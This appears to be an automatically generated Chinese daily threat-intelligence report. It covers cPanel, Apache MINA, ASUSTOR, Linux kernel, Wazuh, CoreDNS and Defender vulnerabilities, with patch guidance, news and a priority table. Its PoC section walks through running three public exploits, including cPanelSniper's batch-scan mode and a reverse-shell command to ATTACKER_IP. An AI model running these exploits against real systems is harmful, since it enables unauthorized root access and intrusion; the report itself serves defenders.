每日安全情报报告 · 2026-05-03
报告日期 :2026-05-03 | 风险概况 :🔴 严重 × 3 | 🟠 高危 × 4 | 🔵 在野利用 × 4
数据来源:NVD、CISA KEV、TheHackerNews、FreeBuf、奇安信CERT、DIESEC、Theori、Rapid7、infosecbulletin
一、高危漏洞速报
🔴 CVE-2026-41940 --- cPanel & WHM 预认证认证绕过(在野零日)
| 属性 | 详情 |
|---|---|
| CVE | CVE-2026-41940 |
| 类型 | 预认证认证绕过(Authentication Bypass) |
| 组件 | cPanel & WHM、WP Squared(WordPress Squared) |
| CVSS | 9.8(严重) |
| 受影响版本 | cPanel > 11.40(含 110.x / 118.x / 126.x / 132.x / 134.x / 136.x) |
| 在野利用 | ✅ 在野利用自 2026年2月23日起已持续约2个月 |
| PoC | ✅ cPanelSniper 武器化框架已于 2026-05-02 公开 |
漏洞详情 :cPanel 的 Session.pm 模块在处理 HTTP Authorization 头时存在逻辑缺陷,攻击者可通过构造恶意 CRLF 注入载荷:①生成预授权 WHM 会话;②注入恶意会话字段;③激活注入获取 WHM root 权限,整个过程无需任何凭据。
影响规模:Shodan 探测显示约 150 万实例暴露,Shadowserver 蜜罐捕获 44,000 个 IP 正在实施攻击或探测;约 650,000 互联网暴露实例已确认受影响。
修复方案:
bash
# 强制更新 cPanel 至已修复版本(各分支见下表)
/scripts/upcp --force
# 修复版本对照:
# 110.x → 11.110.0.97 | 118.x → 11.118.0.63 | 126.x → 11.126.0.54
# 132.x → 11.132.0.29 | 134.x → 11.134.0.20 | 136.x → 11.136.0.5参考链接 :cPanel 官方安全公告 | NVD 详情 | Rapid7 分析报告
🔴 CVE-2026-42779 --- Apache MINA 反序列化 RCE(CVE-2026-41635 补丁不完整)
| 属性 | 详情 |
|---|---|
| CVE | CVE-2026-42779 |
| 关联 CVE | CVE-2026-42778(MINA 静态初始化器绕过)、CVE-2026-41635(未完整修复) |
| 类型 | Java 反序列化远程代码执行(RCE) |
| 组件 | Apache MINA 2.1.x(2.1.0--2.1.11)、2.2.x(2.2.0--2.2.6) |
| CVSS | 9.8(严重) |
| 受影响版本 | MINA 2.1.0--2.1.11、2.2.0--2.2.6 |
| 在野利用 | ⚠️ 暂未见在野利用,无需认证即可触发 |
| PoC | ❌ 暂无公开 PoC |
漏洞详情 :AbstractIoBuffer.resolveClass() 方法中,针对静态类或原始类型的代码分支跳过了类名允许列表校验,导致可加载任意类触发 RCE。CVE-2026-41635 的修复逻辑未同步到 2.1.X 和 2.2.X 分支,属于修复不完整导致的漏洞复发。
修复方案 :立即升级至 Apache MINA 2.1.12 或 2.2.7。
参考链接 :TheHackerWire 分析 | NVD 详情
🔴 CVE-2026-6644 --- ASUSTOR ADM NAS 命令注入根级 RCE(PoC 已公开)
| 属性 | 详情 |
|---|---|
| CVE | CVE-2026-6644 |
| 类型 | OS 命令注入(Command Injection → Root RCE) |
| 组件 | ASUSTOR ADM(NAS 操作系统)PPTP VPN Client 模块 |
| CVSS | 9.4(严重,CVSS v4.0) |
| 受影响版本 | ADM < 5.1.3.RGO1 |
| 在野利用 | ⚠️ 未见活跃在野利用,但 PoC 已公开,默认凭证 admin/admin 大量存在 |
| PoC | ✅ 已公开(GitHub: uky007/CVE-2026-6644) |
漏洞详情 :PPTP VPN Client 模块的服务器地址参数未做任何输入过滤 ,被直接拼接至系统调用 /bin/sh 执行,攻击者注入恶意参数即可以 root 权限运行任意命令。约 19,000 台 ASUSTOR NAS 设备暴露于互联网,且大量设备仍使用默认凭证 admin/admin。
修复方案:
bash
# ADM 管理界面 → 更新中心 → 立即升级至 ADM 5.1.3.RGO1
# 修改默认凭证,禁用 PPTP VPN(如不使用),关闭 WAN 管理访问参考链接 :CyberPress 报告 | GitHub PoC | GBHackers 分析
🟠 CVE-2026-31431 --- Linux 内核 "Copy Fail" 本地提权(CISA KEV 新增 · 在野利用)
| 属性 | 详情 |
|---|---|
| CVE | CVE-2026-31431(代号 Copy Fail) |
| 类型 | 本地提权(LPE)+ 容器逃逸 |
| 组件 | Linux Kernel(AF_ALG / algif_aead 加密子系统) |
| CVSS | 7.8(高危) |
| 受影响版本 | 2017年以来几乎全部 Linux 发行版(Ubuntu、Debian、RHEL、SUSE 等) |
| 在野利用 | ✅ CISA KEV 2026-05-01 新增,确认在野利用 |
| PoC | ✅ GitHub: theori-io/copy-fail-CVE-2026-31431 |
漏洞详情 :由 Theori Xint Code(AI 辅助审计)发现,利用 splice() 系统调用将只读文件(如 /usr/bin/su)的页缓存传递到 AF_ALG 加密管道,触发 authencesn 实现的越界写,修改 su 可执行文件机器码(4字节/次),最终实现非特权用户提权 root。利用成功率宣称 100%,无需竞争条件。页缓存全局共享,容器内触发可影响宿主机。
修复方案:
bash
# Debian/Ubuntu
sudo apt update && sudo apt upgrade linux-image-generic && sudo reboot
# RHEL/CentOS/Rocky Linux
sudo dnf update kernel && sudo reboot
# 临时缓解(无法立即重启时)
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf
sudo rmmod algif_aead 2>/dev/null || true
lsmod | grep algif_aead # 验证已禁用(应无输出)参考链接 :Theori 官方披露 | GitHub PoC | NVD 详情 | FreeBuf 分析
🟠 CVE-2026-30893 --- Wazuh SIEM 集群同步路径穿越(横向移动至 Root)
| 属性 | 详情 |
|---|---|
| CVE | CVE-2026-30893 |
| 类型 | 路径穿越(Path Traversal)→ 任意文件写入 → 权限提升 |
| 组件 | Wazuh 集群同步 decompress_files() 函数 |
| CVSS | 9.0(严重) |
| 受影响版本 | Wazuh 4.4.0 -- 4.14.3 |
| 在野利用 | ⚠️ 暂未见在野利用,官方已发布补丁 |
| PoC | ⚠️ GitHub 安全公告已披露技术细节 |
漏洞详情 :Wazuh 集群节点同步时,decompress_files() 函数未对解压路径进行充分校验,经认证的集群节点可向其他集群成员写入任意文件到指定解压目录之外,可写入 crontab 或 SSH 密钥实现提权,横向移动至集群 root 权限。
修复方案 :立即升级至 Wazuh 4.14.4。
参考链接 :GitHub Security Advisory | CVEFeed 详情 | OpenCVE 记录
🟠 CoreDNS 多高危漏洞(Kubernetes DNS 基础设施告急)
| 属性 | 详情 |
|---|---|
| 影响组件 | CoreDNS(Kubernetes 核心 DNS 组件) |
| 漏洞类型 | DoS、DNS 缓存投毒、信息泄露(DoH/DoQ 相关) |
| 受影响版本 | CoreDNS < 1.14.3 |
| 披露时间 | 2026-04-30 |
| 在野利用 | ⚠️ 暂未见在野利用 |
漏洞详情:CoreDNS 官方于 2026-04-30 发布安全公告,披露多个 DoH/DoQ 协议实现相关高危漏洞,可被攻击者利用导致 Kubernetes 集群 DNS 解析服务中断、DNS 缓存投毒或内部解析信息泄露。CoreDNS 在 Kubernetes 环境中几乎全覆盖部署,暴露面极大。
修复方案 :立即升级至 CoreDNS 1.14.3,限制 DoH/DoQ 公网暴露,加强 DNS 访问控制。
参考链接 :奇安信CERT漏洞动态
🟠 CVE-2026-33825 --- Windows Defender "BlueHammer" TOCTOU 提权(持续在野利用)
| 属性 | 详情 |
|---|---|
| CVE | CVE-2026-33825(代号 BlueHammer) |
| 类型 | TOCTOU 竞争条件 → SYSTEM 级本地提权 |
| 组件 | Microsoft Defender 更新与修复逻辑 |
| CVSS | 7.8(高危) |
| 受影响版本 | Windows 10/11、Windows Server(未修补版本) |
| 在野利用 | ✅ 持续在野利用,已入 CISA KEV |
| PoC | ✅ BlueHammer/RedSun PoC 已公开 |
漏洞详情:低权限攻击者可滥用 Microsoft Defender 更新与修复逻辑中的 TOCTOU 竞争条件,获取 SYSTEM 最高权限。微软已于 2026 年 4 月 Patch Tuesday 发布补丁,但大量未打补丁设备仍处于高危暴露状态。
修复方案:立即安装 2026 年 4 月 Patch Tuesday 补丁,优先处理端点安全工具的更新。
参考链接 :CISA KEV 目录 | SecurityWeek 报告
二、漏洞 PoC 详情
PoC-1:CVE-2026-41940 cPanel WHM 认证绕过(cPanelSniper 框架)
发布者 :安全研究员 Mitsec(@ynsmroztas)
发布时间 :2026-05-02
PoC 链接 :GitHub - ynsmroztas/cPanelSniper
使用步骤:
bash
# 1. 克隆仓库
git clone https://github.com/ynsmroztas/cPanelSniper.git
cd cPanelSniper
# 2. 检查依赖(仅需 Python 3.8+ 内置库,无需 pip 安装)
python3 --version # 确认版本 >= 3.8
# 3. 单目标测试(授权环境专用)
python3 cPanelSniper.py -t https://target.example.com:2087
# 4. 批量扫描模式(支持从文件读取目标列表)
python3 cPanelSniper.py -f targets.txt --threads 10
# 5. 利用链说明:
# 阶段1: 使用无效凭据生成预授权 WHM 会话 → 获取 whostmgrsession cookie
# 阶段2: Authorization: Basic 头注入 CRLF 载荷 → cpsrvd 写入投毒会话字段
# 阶段3: GET /scripts2/listaccts 触发 do_token_denied gadget → 激活恶意字段
# 阶段4: GET /json-api/version → 返回 HTTP 200 确认获取 WHM root 权限(标记 PWNED)⚠️ 警告:此工具仅限授权渗透测试使用,未经授权使用违法。
PoC-2:CVE-2026-31431 Linux "Copy Fail" 内核提权
发布者 :Theori / Taeyang Lee(AI 辅助工具 Xint Code 参与发现)
发布时间 :2026-04-29
PoC 链接 :GitHub - theori-io/copy-fail-CVE-2026-31431
使用步骤:
bash
# 1. 克隆 PoC 仓库
git clone https://github.com/theori-io/copy-fail-CVE-2026-31431.git
cd copy-fail-CVE-2026-31431
# 2. 安装编译依赖
sudo apt install build-essential python3 -y # Debian/Ubuntu
# 或
sudo dnf install gcc python3 -y # RHEL/CentOS
# 3. 编译 PoC
make
# 4. 执行利用(需本地低权限账户)
./copy_fail # 成功后将 /usr/bin/su 页缓存修改,执行后获取 root
# 5. 验证提权成功
id # 应输出 uid=0(root)
# 利用原理:
# splice() 将只读文件页缓存引用至 AF_ALG authencesn 加密管道
# 触发 authencesn 越界写,修改 su 机器码(4 字节/次)
# 执行被修改的 su → 提权 root(无竞争条件,成功率 100%)容器逃逸提示:页缓存全局共享,在容器内执行可穿透容器边界影响宿主机。
参考资源 :Theori 官方博客 | The Register 报道
PoC-3:CVE-2026-6644 ASUSTOR ADM 命令注入 Root RCE
发布者 :安全研究员 uky007
发布时间 :2026-04-30
PoC 链接 :GitHub - uky007/CVE-2026-6644
使用步骤:
bash
# 1. 克隆 PoC
git clone https://github.com/uky007/CVE-2026-6644.git
cd CVE-2026-6644
# 2. 安装依赖
pip3 install requests
# 3. 执行利用(需管理员凭证,或默认 admin/admin)
python3 exploit.py \
--target http://TARGET_NAS_IP:8000 \
--user admin --pass admin \
--cmd "id" # 验证 RCE
# 4. 获取反弹 Shell(示例)
python3 exploit.py \
--target http://TARGET_NAS_IP:8000 \
--user admin --pass admin \
--cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
# 漏洞点:PPTP VPN Client 的服务器地址参数未过滤
# 直接拼接到 /bin/sh 系统调用执行 → root 权限命令注入修复版本 :升级 ADM 固件至 5.1.3.RGO1(ADM 管理界面 → 更新中心)
三、网络安全资讯
📰 1. CISA KEV 更新:CVE-2026-31431 等新增在野利用漏洞
来源 :奇安信CERT漏洞动态
2026年5月1日,CISA 将 Linux 内核 CVE-2026-31431(Copy Fail) 正式收录至已知被利用漏洞(KEV)目录,同时批量收录其他5月初新增漏洞。CVE-2026-31431 因"利用难度极低"(trivially exploitable)、"支持容器逃逸"被列为最高处置优先级。各政府机构须立即完成内核升级,本次 KEV 更新涵盖 Linux、cPanel、CoreDNS 生态。
📰 2. REvil 勒索软件核心成员被德国 BKA 确认身份
来源 :DIESEC 5月安全周报 | The Hacker News
德国联邦刑事警察局(BKA)确认了 REvil/GandCrab 两名核心领导人物身份,关联到德国境内 130 起勒索软件攻击。REvil 虽已"解散",但其联盟运营模式(Ransomware-as-a-Service + 多重勒索)已通过分支继承,持续主导 DACH 地区(德国/奥地利/瑞士)勒索攻击活动。安全机构警告:打击特定团伙并不能消灭其技术与战术的传播。
📰 3. 微软 Entra ID Agent AI 角色存在服务主体接管缺陷
来源 :DIESEC 5月安全周报 | The Hacker News
微软修补了 Entra ID "Agent ID Administrator" 角色的安全缺陷,研究人员发现该角色可被滥用:通过分配所有权、添加凭据,接管任意服务主体 (Service Principal)。随着企业大量部署 AI Agent(自动化流程、M2M 工作流),非人类身份数量激增,而这类身份往往被过度授权,成为攻击者高效提权的新路径。阅读原文
📰 4. 4月数据泄露年度总结:ShinyHunters 横扫 10+ 大型机构
2026年4月成为近年来数据泄露最严峻的月份之一,ShinyHunters 勒索团伙单月攻破超10家大型机构,包括:医疗设备巨头美敦力(900万条记录)、教育平台 Udemy(140万用户)、Amtrak(数百万用户)、加拿大人寿等。特别值得关注的是:
-
LiteLLM 供应链攻击 :Cisco 开发环境源码、AWS 密钥泄露,影响数千家下游企业
-
欧盟委员会入侵 :30个欧盟实体邮件及内部信息泄露
-
洛杉矶警察局:7.7TB 人事、证人、医疗数据泄露
📰 5. ConnectWise ScreenConnect CVE-2024-1708 被 CISA 纳入在野利用目录
来源 :DIESEC 5月安全周报
CISA 将已知旧漏洞 ConnectWise ScreenConnect CVE-2024-1708 (路径穿越)正式纳入 KEV 目录,意味着有证据显示该漏洞仍遭在野积极利用。ScreenConnect 深度嵌入大量企业 IT 运维环境,持有端点及管理员的高权限访问能力。即便补丁早已存在,延迟修补的平台依然是攻击者高效入侵的首选路径。阅读原文
📰 6. Kyber 勒索软件:后量子加密 + VMware ESXi 定向攻击
新型勒索软件 Kyber 于 2026 年 4 月活跃,采用抗量子加密算法 加密受害者数据,同时专门针对 Windows 服务器和 VMware ESXi 虚拟化平台。Kyber 会主动删除所有备份副本(含 Shadow Copy 和 ESXi 快照),大幅提升受害者恢复难度,已被安全研究人员评定为目前防御成本最高的勒索软件变种之一。阅读原文
四、今日风险处置优先级总览
| 优先级 | CVE/事件 | 组件 | CVSS | 操作 |
|---|---|---|---|---|
| 🔴 P0 | CVE-2026-41940 | cPanel & WHM | 9.8 | 立即执行 /scripts/upcp --force |
| 🔴 P0 | CVE-2026-42779 | Apache MINA | 9.8 | 升级至 MINA 2.1.12 / 2.2.7 |
| 🔴 P0 | CVE-2026-6644 | ASUSTOR ADM | 9.4 | 升级固件 ADM 5.1.3.RGO1 |
| 🟠 P1 | CVE-2026-31431 | Linux Kernel | 7.8 | 升级内核 / 禁用 algif_aead |
| 🟠 P1 | CVE-2026-30893 | Wazuh SIEM | 9.0 | 升级至 Wazuh 4.14.4 |
| 🟠 P1 | CoreDNS 多漏洞 | Kubernetes DNS | 高危 | 升级至 CoreDNS 1.14.3 |
| 🟡 P2 | CVE-2026-33825 | Windows Defender | 7.8 | 安装 4月 Patch Tuesday 补丁 |
本报告由自动化情报收集系统生成,数据来源:NVD | CISA KEV | TheHackerNews | FreeBuf | 奇安信CERT